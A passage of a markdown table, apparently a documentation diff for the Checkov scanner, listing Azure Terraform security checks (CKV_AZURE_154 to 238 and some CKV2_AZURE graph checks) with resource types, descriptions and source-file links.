[AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1413 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | +| 1414 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | +| 1415 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | +| 1416 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 1417 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure Databricks Workspace data plane to control plane communication happens over private link | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | +| 1418 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | 
[FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1419 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1420 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1421 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1422 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | +| 1423 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | +| 1424 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. 
| Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | +| 1425 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | +| 1426 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | +| 1427 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | +| 1428 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | +| 1429 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1430 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
| Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1431 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | +| 1432 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | +| 1433 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | +| 1434 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | +| 1435 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | +| 1436 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | +| 1437 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | 
[PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | +| 1438 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | +| 1439 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1440 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1441 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1442 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1443 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1444 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | 
[VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1445 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1446 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1447 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | +| 1448 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. 
| Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | +| 1449 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1450 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1451 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | +| 1452 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | +| 1453 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | +| 1454 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. 
| Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | +| 1455 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | +| 1456 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | +| 1457 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | +| 1458 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | +| 1459 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | +| 1460 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | +| 1461 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public 
network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | +| 1462 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | +| 1463 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | +| 1464 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | +| 1465 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | +| 1466 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | +| 1467 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | +| 1468 | 
CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | +| 1469 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | +| 1470 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | +| 1471 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | +| 1472 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | +| 1473 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | +| 1474 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | 
[StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | +| 1475 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | +| 1476 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | +| 1477 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | +| 1478 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | +| 1479 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | +| 1480 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | +| 1481 | CKV_AZURE_213 | resource | 
azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1482 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1483 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1484 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 1485 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 1486 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | +| 1487 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | +| 1488 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow 
connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | +| 1489 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | +| 1490 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | +| 1491 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | +| 1492 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1493 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1494 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1495 | 
CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1496 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 1497 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 1498 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | +| 1499 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | +| 1500 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | +| 1501 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | 
[AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | +| 1502 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 1503 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 1504 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | +| 1505 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | +| 1506 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | +| 1507 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | 
[AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | +| 1508 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | +| 1509 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | +| 1510 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | +| 1511 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | +| 1512 | CKV_AZURE_236 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts enable local authentication | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py) | +| 1513 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. 
| Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | +| 1514 | CKV_AZURE_238 | resource | azurerm_cognitive_account | Ensure that Cognitive Services account is not configured with managed identity | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py) | +| 1515 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | +| 1516 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 1517 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 1518 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 1519 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | 
